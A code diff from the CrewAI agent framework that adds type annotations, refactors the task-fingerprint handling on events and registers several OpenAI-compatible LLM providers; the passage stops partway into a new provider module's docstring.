from_agent: Any | None = None
from_task: Any | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
self._set_agent_params(data)
self._set_task_params(data)

View File

@@ -15,7 +15,7 @@ class ReasoningEvent(BaseEvent):
agent_id: str | None = None
from_agent: Any | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
self._set_task_params(data)
self._set_agent_params(data)

View File

@@ -4,6 +4,15 @@ from crewai.events.base_events import BaseEvent
from crewai.tasks.task_output import TaskOutput
def _set_task_fingerprint(event: BaseEvent, task: Any) -> None:
"""Set fingerprint data on an event from a task object."""
if task is not None and task.fingerprint:
event.source_fingerprint = task.fingerprint.uuid_str
event.source_type = "task"
if task.fingerprint.metadata:
event.fingerprint_metadata = task.fingerprint.metadata
class TaskStartedEvent(BaseEvent):
"""Event emitted when a task starts"""
@@ -11,17 +20,9 @@ class TaskStartedEvent(BaseEvent):
context: str | None
task: Any | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
# Set fingerprint data from the task
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
self.source_fingerprint = self.task.fingerprint.uuid_str
self.source_type = "task"
if (
hasattr(self.task.fingerprint, "metadata")
and self.task.fingerprint.metadata
):
self.fingerprint_metadata = self.task.fingerprint.metadata
_set_task_fingerprint(self, self.task)
class TaskCompletedEvent(BaseEvent):
@@ -31,17 +32,9 @@ class TaskCompletedEvent(BaseEvent):
type: str = "task_completed"
task: Any | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
# Set fingerprint data from the task
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
self.source_fingerprint = self.task.fingerprint.uuid_str
self.source_type = "task"
if (
hasattr(self.task.fingerprint, "metadata")
and self.task.fingerprint.metadata
):
self.fingerprint_metadata = self.task.fingerprint.metadata
_set_task_fingerprint(self, self.task)
class TaskFailedEvent(BaseEvent):
@@ -51,17 +44,9 @@ class TaskFailedEvent(BaseEvent):
type: str = "task_failed"
task: Any | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
# Set fingerprint data from the task
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
self.source_fingerprint = self.task.fingerprint.uuid_str
self.source_type = "task"
if (
hasattr(self.task.fingerprint, "metadata")
and self.task.fingerprint.metadata
):
self.fingerprint_metadata = self.task.fingerprint.metadata
_set_task_fingerprint(self, self.task)
class TaskEvaluationEvent(BaseEvent):
@@ -71,14 +56,6 @@ class TaskEvaluationEvent(BaseEvent):
evaluation_type: str
task: Any | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
# Set fingerprint data from the task
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
self.source_fingerprint = self.task.fingerprint.uuid_str
self.source_type = "task"
if (
hasattr(self.task.fingerprint, "metadata")
and self.task.fingerprint.metadata
):
self.fingerprint_metadata = self.task.fingerprint.metadata
_set_task_fingerprint(self, self.task)

View File

@@ -8,7 +8,7 @@ from datetime import datetime
import inspect
import json
import threading
from typing import TYPE_CHECKING, Any, Literal, cast
from typing import TYPE_CHECKING, Any, Literal, TypeVar, cast
from uuid import uuid4
from pydantic import BaseModel, Field, GetCoreSchemaHandler
@@ -22,7 +22,11 @@ from crewai.agents.parser import (
AgentFinish,
OutputParserError,
)
from crewai.core.providers.human_input import get_provider
from crewai.core.providers.human_input import (
AsyncExecutorContext,
ExecutorContext,
get_provider,
)
from crewai.events.event_bus import crewai_event_bus
from crewai.events.listeners.tracing.utils import (
is_tracing_enabled_in_context,
@@ -89,7 +93,7 @@ from crewai.utilities.planning_types import (
TodoList,
)
from crewai.utilities.printer import Printer
from crewai.utilities.step_execution_context import StepExecutionContext
from crewai.utilities.step_execution_context import StepExecutionContext, StepResult
from crewai.utilities.string_utils import sanitize_tool_name
from crewai.utilities.tool_utils import execute_tool_and_check_finality
from crewai.utilities.training_handler import CrewTrainingHandler
@@ -105,6 +109,8 @@ if TYPE_CHECKING:
from crewai.tools.tool_types import ToolResult
from crewai.utilities.prompts import StandardPromptResult, SystemPromptResult
_RouteT = TypeVar("_RouteT", bound=str)
class AgentExecutorState(BaseModel):
"""Structured state for agent executor flow.
@@ -446,29 +452,29 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
step failures reliably trigger replanning rather than being
silently ignored.
"""
config = getattr(self.agent, "planning_config", None)
if config is not None and hasattr(config, "reasoning_effort"):
config = self.agent.planning_config
if config is not None:
return config.reasoning_effort
return "medium"
def _get_max_replans(self) -> int:
"""Get max replans from planning config or default to 3."""
config = getattr(self.agent, "planning_config", None)
if config is not None and hasattr(config, "max_replans"):
config = self.agent.planning_config
if config is not None:
return config.max_replans
return 3
def _get_max_step_iterations(self) -> int:
"""Get max step iterations from planning config or default to 15."""
config = getattr(self.agent, "planning_config", None)
if config is not None and hasattr(config, "max_step_iterations"):
config = self.agent.planning_config
if config is not None:
return config.max_step_iterations
return 15
def _get_step_timeout(self) -> int | None:
"""Get per-step timeout from planning config or default to None."""
config = getattr(self.agent, "planning_config", None)
if config is not None and hasattr(config, "step_timeout"):
config = self.agent.planning_config
if config is not None:
return config.step_timeout
return None
@@ -1130,9 +1136,9 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
# Process results: store on todos and log, then observe each.
# asyncio.gather preserves input order, so zip gives us the exact
# todo ↔ result (or exception) mapping.
step_results: list[tuple[TodoItem, object]] = []
step_results: list[tuple[TodoItem, StepResult]] = []
for todo, item in zip(ready, gathered, strict=True):
if isinstance(item, Exception):
if isinstance(item, BaseException):
error_msg = f"Error: {item!s}"
todo.result = error_msg
self.state.todos.mark_failed(todo.step_number, result=error_msg)
@@ -1143,31 +1149,34 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
)
else:
_returned_todo, result = item
todo.result = result.result
step_result = cast(StepResult, result)
todo.result = step_result.result
self.state.execution_log.append(
{
"type": "step_execution",
"step_number": todo.step_number,
"success": result.success,
"result_preview": result.result[:200] if result.result else "",
"error": result.error,
"tool_calls": result.tool_calls_made,
"execution_time": result.execution_time,
"success": step_result.success,
"result_preview": step_result.result[:200]
if step_result.result
else "",
"error": step_result.error,
"tool_calls": step_result.tool_calls_made,
"execution_time": step_result.execution_time,
}
)
if self.agent.verbose:
status = "success" if result.success else "failed"
status = "success" if step_result.success else "failed"
self._printer.print(
content=(
f"[Execute] Step {todo.step_number} {status} "
f"({result.execution_time:.1f}s, "
f"{len(result.tool_calls_made)} tool calls)"
f"({step_result.execution_time:.1f}s, "
f"{len(step_result.tool_calls_made)} tool calls)"
),
color="green" if result.success else "red",
color="green" if step_result.success else "red",
)
step_results.append((todo, result))
step_results.append((todo, step_result))
# Observe each completed step sequentially (observation updates shared state)
effort = self._get_reasoning_effort()
@@ -1431,8 +1440,8 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
raise
def _route_finish_with_todos(
self, default_route: str
) -> Literal["native_finished", "agent_finished", "todo_satisfied"]:
self, default_route: _RouteT
) -> _RouteT | Literal["todo_satisfied"]:
"""Helper to route finish events, checking for pending todos first.
If there are pending todos, route to todo_satisfied instead of the
@@ -1448,7 +1457,7 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
current_todo = self.state.todos.current_todo
if current_todo:
return "todo_satisfied"
return default_route # type: ignore[return-value]
return default_route
@router(call_llm_and_parse)
def route_by_answer_type(
@@ -2063,7 +2072,7 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
elif not self.state.current_answer and self.state.messages:
# For native tools, results are in the message history as 'tool' roles
# We take the content of the most recent tool results
tool_results = []
tool_results: list[str] = []
for msg in reversed(self.state.messages):
if msg.get("role") == "tool":
tool_results.insert(0, str(msg.get("content", "")))
@@ -3003,7 +3012,7 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
Final answer after feedback.
"""
provider = get_provider()
return provider.handle_feedback(formatted_answer, self)
return provider.handle_feedback(formatted_answer, cast("ExecutorContext", self))
async def _ahandle_human_feedback(
self, formatted_answer: AgentFinish
@@ -3017,7 +3026,9 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
Final answer after feedback.
"""
provider = get_provider()
return await provider.handle_feedback_async(formatted_answer, self)
return await provider.handle_feedback_async(
formatted_answer, cast("AsyncExecutorContext", self)
)
def _is_training_mode(self) -> bool:
"""Check if training mode is active.

View File

@@ -37,11 +37,11 @@ class ExecutionState:
current_agent_id: str | None = None
current_task_id: str | None = None
def __init__(self):
self.traces = {}
self.iteration = 1
self.iterations_results = {}
self.agent_evaluators = {}
def __init__(self) -> None:
self.traces: dict[str, Any] = {}
self.iteration: int = 1
self.iterations_results: dict[int, dict[str, list[AgentEvaluationResult]]] = {}
self.agent_evaluators: dict[str, Sequence[BaseEvaluator] | None] = {}
class AgentEvaluator:
@@ -295,7 +295,7 @@ class AgentEvaluator:
def emit_evaluation_started_event(
self, agent_role: str, agent_id: str, task_id: str | None = None
):
) -> None:
crewai_event_bus.emit(
self,
AgentEvaluationStartedEvent(
@@ -313,7 +313,7 @@ class AgentEvaluator:
task_id: str | None = None,
metric_category: MetricCategory | None = None,
score: EvaluationScore | None = None,
):
) -> None:
crewai_event_bus.emit(
self,
AgentEvaluationCompletedEvent(
@@ -328,7 +328,7 @@ class AgentEvaluator:
def emit_evaluation_failed_event(
self, agent_role: str, agent_id: str, error: str, task_id: str | None = None
):
) -> None:
crewai_event_bus.emit(
self,
AgentEvaluationFailedEvent(
@@ -341,7 +341,9 @@ class AgentEvaluator:
)
def create_default_evaluator(agents: list[Agent] | list[BaseAgent], llm: None = None):
def create_default_evaluator(
agents: list[Agent] | list[BaseAgent], llm: None = None
) -> AgentEvaluator:
from crewai.experimental.evaluation import (
GoalAlignmentEvaluator,
ParameterExtractionEvaluator,

View File

@@ -8,7 +8,7 @@ from typing import TYPE_CHECKING, Any
from pydantic import BaseModel, Field
from crewai.agents.agent_builder.base_agent import BaseAgent
from crewai.llm import BaseLLM
from crewai.llms.base_llm import BaseLLM
from crewai.task import Task
from crewai.utilities.llm_utils import create_llm
@@ -25,7 +25,7 @@ class MetricCategory(enum.Enum):
PARAMETER_EXTRACTION = "parameter_extraction"
TOOL_INVOCATION = "tool_invocation"
def title(self):
def title(self) -> str:
return self.value.replace("_", " ").title()

View File

@@ -18,12 +18,12 @@ from crewai.utilities.types import LLMMessage
class EvaluationDisplayFormatter:
def __init__(self):
def __init__(self) -> None:
self.console_formatter = ConsoleFormatter()
def display_evaluation_with_feedback(
self, iterations_results: dict[int, dict[str, list[Any]]]
):
) -> None:
if not iterations_results:
self.console_formatter.print(
"[yellow]No evaluation results to display[/yellow]"
@@ -103,7 +103,7 @@ class EvaluationDisplayFormatter:
def display_summary_results(
self,
iterations_results: dict[int, dict[str, list[AgentEvaluationResult]]],
):
) -> None:
if not iterations_results:
self.console_formatter.print(
"[yellow]No evaluation results to display[/yellow]"

View File

@@ -1,6 +1,11 @@
"""Event listener for collecting execution traces for evaluation."""
from __future__ import annotations
from collections.abc import Sequence
from datetime import datetime
from typing import Any
from uuid import UUID
from crewai.agents.agent_builder.base_agent import BaseAgent
from crewai.events.base_event_listener import BaseEventListener
@@ -30,47 +35,63 @@ class EvaluationTraceCallback(BaseEventListener):
retrievals, and final output - all for use in agent evaluation.
"""
_instance = None
_instance: EvaluationTraceCallback | None = None
_initialized: bool = False
def __new__(cls):
def __new__(cls) -> EvaluationTraceCallback:
"""Create or return the singleton instance."""
if cls._instance is None:
cls._instance = super().__new__(cls)
cls._instance._initialized = False
return cls._instance
def __init__(self):
if not hasattr(self, "_initialized") or not self._initialized:
def __init__(self) -> None:
"""Initialize the evaluation trace callback."""
if not self._initialized:
super().__init__()
self.traces = {}
self.current_agent_id = None
self.current_task_id = None
self.traces: dict[str, Any] = {}
self.current_agent_id: UUID | str | None = None
self.current_task_id: UUID | str | None = None
self.current_llm_call: dict[str, Any] = {}
self._initialized = True
def setup_listeners(self, event_bus: CrewAIEventsBus):
def setup_listeners(self, event_bus: CrewAIEventsBus) -> None:
"""Set up event listeners on the event bus.
Args:
event_bus: The event bus to register listeners on.
"""
@event_bus.on(AgentExecutionStartedEvent)
def on_agent_started(source, event: AgentExecutionStartedEvent):
def on_agent_started(source: Any, event: AgentExecutionStartedEvent) -> None:
self.on_agent_start(event.agent, event.task)
@event_bus.on(LiteAgentExecutionStartedEvent)
def on_lite_agent_started(source, event: LiteAgentExecutionStartedEvent):
def on_lite_agent_started(
source: Any, event: LiteAgentExecutionStartedEvent
) -> None:
self.on_lite_agent_start(event.agent_info)
@event_bus.on(AgentExecutionCompletedEvent)
def on_agent_completed(source, event: AgentExecutionCompletedEvent):
def on_agent_completed(
source: Any, event: AgentExecutionCompletedEvent
) -> None:
self.on_agent_finish(event.agent, event.task, event.output)
@event_bus.on(LiteAgentExecutionCompletedEvent)
def on_lite_agent_completed(source, event: LiteAgentExecutionCompletedEvent):
def on_lite_agent_completed(
source: Any, event: LiteAgentExecutionCompletedEvent
) -> None:
self.on_lite_agent_finish(event.output)
@event_bus.on(ToolUsageFinishedEvent)
def on_tool_completed(source, event: ToolUsageFinishedEvent):
def on_tool_completed(source: Any, event: ToolUsageFinishedEvent) -> None:
self.on_tool_use(
event.tool_name, event.tool_args, event.output, success=True
)
@event_bus.on(ToolUsageErrorEvent)
def on_tool_usage_error(source, event: ToolUsageErrorEvent):
def on_tool_usage_error(source: Any, event: ToolUsageErrorEvent) -> None:
self.on_tool_use(
event.tool_name,
event.tool_args,
@@ -80,7 +101,9 @@ class EvaluationTraceCallback(BaseEventListener):
)
@event_bus.on(ToolExecutionErrorEvent)
def on_tool_execution_error(source, event: ToolExecutionErrorEvent):
def on_tool_execution_error(
source: Any, event: ToolExecutionErrorEvent
) -> None:
self.on_tool_use(
event.tool_name,
event.tool_args,
@@ -90,7 +113,9 @@ class EvaluationTraceCallback(BaseEventListener):
)
@event_bus.on(ToolSelectionErrorEvent)
def on_tool_selection_error(source, event: ToolSelectionErrorEvent):
def on_tool_selection_error(
source: Any, event: ToolSelectionErrorEvent
) -> None:
self.on_tool_use(
event.tool_name,
event.tool_args,
@@ -100,7 +125,9 @@ class EvaluationTraceCallback(BaseEventListener):
)
@event_bus.on(ToolValidateInputErrorEvent)
def on_tool_validate_input_error(source, event: ToolValidateInputErrorEvent):
def on_tool_validate_input_error(
source: Any, event: ToolValidateInputErrorEvent
) -> None:
self.on_tool_use(
event.tool_name,
event.tool_args,
@@ -110,14 +137,19 @@ class EvaluationTraceCallback(BaseEventListener):
)
@event_bus.on(LLMCallStartedEvent)
def on_llm_call_started(source, event: LLMCallStartedEvent):
def on_llm_call_started(source: Any, event: LLMCallStartedEvent) -> None:
self.on_llm_call_start(event.messages, event.tools)
@event_bus.on(LLMCallCompletedEvent)
def on_llm_call_completed(source, event: LLMCallCompletedEvent):
def on_llm_call_completed(source: Any, event: LLMCallCompletedEvent) -> None:
self.on_llm_call_end(event.messages, event.response)
def on_lite_agent_start(self, agent_info: dict[str, Any]):
def on_lite_agent_start(self, agent_info: dict[str, Any]) -> None:
"""Handle a lite agent execution start event.
Args:
agent_info: Dictionary containing agent information.
"""
self.current_agent_id = agent_info["id"]
self.current_task_id = "lite_task"
@@ -132,10 +164,22 @@ class EvaluationTraceCallback(BaseEventListener):
final_output=None,
)
def _init_trace(self, trace_key: str, **kwargs: Any):
def _init_trace(self, trace_key: str, **kwargs: Any) -> None:
"""Initialize a trace entry.
Args:
trace_key: The key to store the trace under.
**kwargs: Trace metadata to store.
"""
self.traces[trace_key] = kwargs
def on_agent_start(self, agent: BaseAgent, task: Task):
def on_agent_start(self, agent: BaseAgent, task: Task) -> None:
"""Handle an agent execution start event.
Args:
agent: The agent that started execution.
task: The task being executed.
"""
self.current_agent_id = agent.id
self.current_task_id = task.id
@@ -150,7 +194,14 @@ class EvaluationTraceCallback(BaseEventListener):
final_output=None,
)
def on_agent_finish(self, agent: BaseAgent, task: Task, output: Any):
def on_agent_finish(self, agent: BaseAgent, task: Task, output: Any) -> None:
"""Handle an agent execution completion event.
Args:
agent: The agent that finished execution.
task: The task that was executed.
output: The agent's output.
"""
trace_key = f"{agent.id}_{task.id}"
if trace_key in self.traces:
self.traces[trace_key]["final_output"] = output
@@ -158,11 +209,17 @@ class EvaluationTraceCallback(BaseEventListener):
self._reset_current()
def _reset_current(self):
def _reset_current(self) -> None:
"""Reset the current agent and task tracking state."""
self.current_agent_id = None
self.current_task_id = None
def on_lite_agent_finish(self, output: Any):
def on_lite_agent_finish(self, output: Any) -> None:
"""Handle a lite agent execution completion event.
Args:
output: The agent's output.
"""
trace_key = f"{self.current_agent_id}_lite_task"
if trace_key in self.traces:
self.traces[trace_key]["final_output"] = output
@@ -177,13 +234,22 @@ class EvaluationTraceCallback(BaseEventListener):
result: Any,
success: bool = True,
error_type: str | None = None,
):
) -> None:
"""Record a tool usage event in the current trace.
Args:
tool_name: Name of the tool used.
tool_args: Arguments passed to the tool.
result: The tool's output or error message.
success: Whether the tool call succeeded.
error_type: Type of error if the call failed.
"""
if not self.current_agent_id or not self.current_task_id:
return
trace_key = f"{self.current_agent_id}_{self.current_task_id}"
if trace_key in self.traces:
tool_use = {
tool_use: dict[str, Any] = {
"tool": tool_name,
"args": tool_args,
"result": result,
@@ -191,7 +257,6 @@ class EvaluationTraceCallback(BaseEventListener):
"timestamp": datetime.now(),
}
# Add error information if applicable
if not success and error_type:
tool_use["error"] = True
tool_use["error_type"] = error_type
@@ -202,7 +267,13 @@ class EvaluationTraceCallback(BaseEventListener):
self,
messages: str | Sequence[dict[str, Any]] | None,
tools: Sequence[dict[str, Any]] | None = None,
):
) -> None:
"""Record an LLM call start event.
Args:
messages: The messages sent to the LLM.
tools: Tool definitions provided to the LLM.
"""
if not self.current_agent_id or not self.current_task_id:
return
@@ -220,7 +291,13 @@ class EvaluationTraceCallback(BaseEventListener):
def on_llm_call_end(
self, messages: str | list[dict[str, Any]] | None, response: Any
):
) -> None:
"""Record an LLM call completion event.
Args:
messages: The messages from the LLM call.
response: The LLM response object.
"""
if not self.current_agent_id or not self.current_task_id:
return
@@ -229,17 +306,18 @@ class EvaluationTraceCallback(BaseEventListener):
return
total_tokens = 0
if hasattr(response, "usage") and hasattr(response.usage, "total_tokens"):
total_tokens = response.usage.total_tokens
usage = getattr(response, "usage", None)
if usage is not None:
total_tokens = getattr(usage, "total_tokens", 0)
current_time = datetime.now()
start_time = None
if hasattr(self, "current_llm_call") and self.current_llm_call:
start_time = self.current_llm_call.get("start_time")
start_time = (
self.current_llm_call.get("start_time") if self.current_llm_call else None
)
if not start_time:
start_time = current_time
llm_call = {
llm_call: dict[str, Any] = {
"messages": messages,
"response": response,
"start_time": start_time,
@@ -248,16 +326,28 @@ class EvaluationTraceCallback(BaseEventListener):
}
self.traces[trace_key]["llm_calls"].append(llm_call)
if hasattr(self, "current_llm_call"):
self.current_llm_call = {}
self.current_llm_call = {}
def get_trace(self, agent_id: str, task_id: str) -> dict[str, Any] | None:
"""Retrieve a trace by agent and task ID.
Args:
agent_id: The agent's identifier.
task_id: The task's identifier.
Returns:
The trace dictionary, or None if not found.
"""
trace_key = f"{agent_id}_{task_id}"
return self.traces.get(trace_key)
def create_evaluation_callbacks() -> EvaluationTraceCallback:
"""Create and register an evaluation trace callback on the event bus.
Returns:
The configured EvaluationTraceCallback instance.
"""
from crewai.events.event_bus import crewai_event_bus
callback = EvaluationTraceCallback()

View File

@@ -8,10 +8,10 @@ from crewai.experimental.evaluation.experiment.result import ExperimentResults
class ExperimentResultsDisplay:
def __init__(self):
def __init__(self) -> None:
self.console = Console()
def summary(self, experiment_results: ExperimentResults):
def summary(self, experiment_results: ExperimentResults) -> None:
total = len(experiment_results.results)
passed = sum(1 for r in experiment_results.results if r.passed)
@@ -28,7 +28,9 @@ class ExperimentResultsDisplay:
self.console.print(table)
def comparison_summary(self, comparison: dict[str, Any], baseline_timestamp: str):
def comparison_summary(
self, comparison: dict[str, Any], baseline_timestamp: str
) -> None:
self.console.print(
Panel(
f"[bold]Comparison with baseline run from {baseline_timestamp}[/bold]",

View File

@@ -6,7 +6,7 @@ from typing import TYPE_CHECKING, Any
from crewai.agents.agent_builder.base_agent import BaseAgent
from crewai.experimental.evaluation import AgentEvaluator, create_default_evaluator
from crewai.experimental.evaluation.evaluation_display import (
from crewai.experimental.evaluation.base_evaluator import (
AgentAggregatedEvaluationResult,
)
from crewai.experimental.evaluation.experiment.result import (

View File

@@ -7,7 +7,8 @@ from typing import Any
def extract_json_from_llm_response(text: str) -> dict[str, Any]:
try:
return json.loads(text)
result: dict[str, Any] = json.loads(text)
return result
except json.JSONDecodeError:
pass
@@ -24,7 +25,8 @@ def extract_json_from_llm_response(text: str) -> dict[str, Any]:
matches = re.findall(pattern, text, re.IGNORECASE | re.DOTALL)
for match in matches:
try:
return json.loads(match.strip())
parsed: dict[str, Any] = json.loads(match.strip())
return parsed
except json.JSONDecodeError: # noqa: PERF203
continue
raise ValueError("No valid JSON found in the response")

View File

@@ -68,7 +68,7 @@ Evaluate how well the agent's output aligns with the assigned task goal.
]
if self.llm is None:
raise ValueError("LLM must be initialized")
response = self.llm.call(prompt) # type: ignore[arg-type]
response = self.llm.call(prompt)
try:
evaluation_data: dict[str, Any] = extract_json_from_llm_response(response)

View File

@@ -224,7 +224,9 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
raw_response=response,
)
def _detect_loops(self, llm_calls: list[dict]) -> tuple[bool, list[dict]]:
def _detect_loops(
self, llm_calls: list[dict[str, Any]]
) -> tuple[bool, list[dict[str, Any]]]:
loop_details = []
messages = []
@@ -272,7 +274,9 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
return intersection / union if union > 0 else 0.0
def _analyze_reasoning_patterns(self, llm_calls: list[dict]) -> dict[str, Any]:
def _analyze_reasoning_patterns(
self, llm_calls: list[dict[str, Any]]
) -> dict[str, Any]:
call_lengths = []
response_times = []
@@ -345,7 +349,7 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
max_possible_slope = max(values) - min(values)
if max_possible_slope > 0:
normalized_slope = slope / max_possible_slope
return max(min(normalized_slope, 1.0), -1.0)
return float(max(min(normalized_slope, 1.0), -1.0))
return 0.0
except Exception:
return 0.0
@@ -384,7 +388,7 @@ Identify any inefficient reasoning patterns and provide specific suggestions for
return float(np.mean(indicators)) if indicators else 0.0
def _get_call_samples(self, llm_calls: list[dict]) -> str:
def _get_call_samples(self, llm_calls: list[dict[str, Any]]) -> str:
samples = []
if len(llm_calls) <= 6:

View File

@@ -299,15 +299,15 @@ def _extract_all_methods_from_condition(
return []
if isinstance(condition, dict):
conditions_list = condition.get("conditions", [])
methods: list[str] = []
dict_methods: list[str] = []
for sub_cond in conditions_list:
methods.extend(_extract_all_methods_from_condition(sub_cond))
return methods
dict_methods.extend(_extract_all_methods_from_condition(sub_cond))
return dict_methods
if isinstance(condition, list):
methods = []
list_methods: list[str] = []
for item in condition:
methods.extend(_extract_all_methods_from_condition(item))
return methods
list_methods.extend(_extract_all_methods_from_condition(item))
return list_methods
return []
@@ -476,7 +476,8 @@ def _detect_flow_inputs(flow_class: type) -> list[str]:
# Check for inputs in __init__ signature beyond standard Flow params
try:
init_sig = inspect.signature(flow_class.__init__)
init_method = flow_class.__init__ # type: ignore[misc]
init_sig = inspect.signature(init_method)
standard_params = {
"self",
"persistence",

View File

@@ -83,8 +83,11 @@ def _serialize_llm_for_context(llm: Any) -> dict[str, Any] | str | None:
subclasses). Falls back to extracting the model string with provider
prefix for unknown LLM types.
"""
if hasattr(llm, "to_config_dict"):
return llm.to_config_dict()
to_config: Callable[[], dict[str, Any]] | None = getattr(
llm, "to_config_dict", None
)
if to_config is not None:
return to_config()
# Fallback for non-BaseLLM objects: just extract model + provider prefix
model = getattr(llm, "model", None)
@@ -371,8 +374,11 @@ def human_feedback(
) -> Any:
"""Recall past HITL lessons and use LLM to pre-review the output."""
try:
mem = flow_instance.memory
if mem is None:
return method_output
query = f"human feedback lessons for {func.__name__}: {method_output!s}"
matches = flow_instance.memory.recall(query, source=learn_source)
matches = mem.recall(query, source=learn_source)
if not matches:
return method_output
@@ -404,6 +410,9 @@ def human_feedback(
) -> None:
"""Extract generalizable lessons from output + feedback, store in memory."""
try:
mem = flow_instance.memory
if mem is None:
return
llm_inst = _resolve_llm_instance()
prompt = _get_hitl_prompt("hitl_distill_user").format(
method_name=func.__name__,
@@ -435,7 +444,7 @@ def human_feedback(
]
if lessons:
flow_instance.memory.remember_many(lessons, source=learn_source)
mem.remember_many(lessons, source=learn_source) # type: ignore[union-attr]
except Exception: # noqa: S110
pass # non-critical: don't fail the flow because lesson storage failed

View File

@@ -122,7 +122,7 @@ def before_llm_call(
"""
from crewai.hooks.llm_hooks import register_before_llm_call_hook
return _create_hook_decorator( # type: ignore[return-value]
return _create_hook_decorator( # type: ignore[no-any-return]
hook_type="llm",
register_function=register_before_llm_call_hook,
marker_attribute="is_before_llm_call_hook",
@@ -176,7 +176,7 @@ def after_llm_call(
"""
from crewai.hooks.llm_hooks import register_after_llm_call_hook
return _create_hook_decorator( # type: ignore[return-value]
return _create_hook_decorator( # type: ignore[no-any-return]
hook_type="llm",
register_function=register_after_llm_call_hook,
marker_attribute="is_after_llm_call_hook",
@@ -237,7 +237,7 @@ def before_tool_call(
"""
from crewai.hooks.tool_hooks import register_before_tool_call_hook
return _create_hook_decorator( # type: ignore[return-value]
return _create_hook_decorator( # type: ignore[no-any-return]
hook_type="tool",
register_function=register_before_tool_call_hook,
marker_attribute="is_before_tool_call_hook",
@@ -293,7 +293,7 @@ def after_tool_call(
"""
from crewai.hooks.tool_hooks import register_after_tool_call_hook
return _create_hook_decorator( # type: ignore[return-value]
return _create_hook_decorator( # type: ignore[no-any-return]
hook_type="tool",
register_function=register_after_tool_call_hook,
marker_attribute="is_after_tool_call_hook",

View File

@@ -13,7 +13,7 @@ class BaseKnowledgeSource(BaseModel, ABC):
chunk_size: int = 4000
chunk_overlap: int = 200
chunks: list[str] = Field(default_factory=list)
chunk_embeddings: list[np.ndarray] = Field(default_factory=list)
chunk_embeddings: list[np.ndarray[Any, np.dtype[Any]]] = Field(default_factory=list)
model_config = ConfigDict(arbitrary_types_allowed=True)
storage: KnowledgeStorage | None = Field(default=None)
@@ -28,7 +28,7 @@ class BaseKnowledgeSource(BaseModel, ABC):
def add(self) -> None:
"""Process content, chunk it, compute embeddings, and save them."""
def get_embeddings(self) -> list[np.ndarray]:
def get_embeddings(self) -> list[np.ndarray[Any, np.dtype[Any]]]:
"""Return the list of embeddings for the chunks."""
return self.chunk_embeddings

View File

@@ -309,6 +309,14 @@ SUPPORTED_NATIVE_PROVIDERS: Final[list[str]] = [
"gemini",
"bedrock",
"aws",
# OpenAI-compatible providers
"openrouter",
"deepseek",
"ollama",
"ollama_chat",
"hosted_vllm",
"cerebras",
"dashscope",
]
@@ -368,6 +376,14 @@ class LLM(BaseLLM):
"gemini": "gemini",
"bedrock": "bedrock",
"aws": "bedrock",
# OpenAI-compatible providers
"openrouter": "openrouter",
"deepseek": "deepseek",
"ollama": "ollama",
"ollama_chat": "ollama_chat",
"hosted_vllm": "hosted_vllm",
"cerebras": "cerebras",
"dashscope": "dashscope",
}
canonical_provider = provider_mapping.get(prefix.lower())
@@ -467,6 +483,29 @@ class LLM(BaseLLM):
for prefix in ["gpt-", "gpt-35-", "o1", "o3", "o4", "azure-"]
)
# OpenAI-compatible providers - accept any model name since these
# providers host many different models with varied naming conventions
if provider == "deepseek":
return model_lower.startswith("deepseek")
if provider == "ollama" or provider == "ollama_chat":
# Ollama accepts any local model name
return True
if provider == "hosted_vllm":
# vLLM serves any model
return True
if provider == "cerebras":
return True
if provider == "dashscope":
return model_lower.startswith("qwen")
if provider == "openrouter":
# OpenRouter uses org/model format but accepts anything
return True
return False
@classmethod
@@ -566,6 +605,23 @@ class LLM(BaseLLM):
return BedrockCompletion
# OpenAI-compatible providers
openai_compatible_providers = {
"openrouter",
"deepseek",
"ollama",
"ollama_chat",
"hosted_vllm",
"cerebras",
"dashscope",
}
if provider in openai_compatible_providers:
from crewai.llms.providers.openai_compatible.completion import (
OpenAICompatibleCompletion,
)
return OpenAICompatibleCompletion
return None
def __init__(
@@ -2313,8 +2369,8 @@ class LLM(BaseLLM):
cb.strip() for cb in failure_callbacks_str.split(",") if cb.strip()
]
litellm.success_callback = success_callbacks
litellm.failure_callback = failure_callbacks
litellm.success_callback = success_callbacks # type: ignore[assignment]
litellm.failure_callback = failure_callbacks # type: ignore[assignment]
def __copy__(self) -> LLM:
"""Create a shallow copy of the LLM instance."""

View File

@@ -222,6 +222,7 @@ class AnthropicCompletion(BaseLLM):
self.previous_thinking_blocks: list[ThinkingBlock] = []
self.response_format = response_format
# Tool search config
self.tool_search: AnthropicToolSearchConfig | None
if tool_search is True:
self.tool_search = AnthropicToolSearchConfig()
elif isinstance(tool_search, AnthropicToolSearchConfig):

View File

@@ -0,0 +1,14 @@
"""OpenAI-compatible providers module."""
from crewai.llms.providers.openai_compatible.completion import (
OPENAI_COMPATIBLE_PROVIDERS,
OpenAICompatibleCompletion,
ProviderConfig,
)
__all__ = [
"OPENAI_COMPATIBLE_PROVIDERS",
"OpenAICompatibleCompletion",
"ProviderConfig",
]

View File

@@ -0,0 +1,282 @@
"""OpenAI-compatible providers implementation.
This module provides a thin subclass of OpenAICompletion that supports
various OpenAI-compatible APIs like OpenRouter, DeepSeek, Ollama, vLLM,
Cerebras, and Dashscope (Alibaba/Qwen).
Usage:
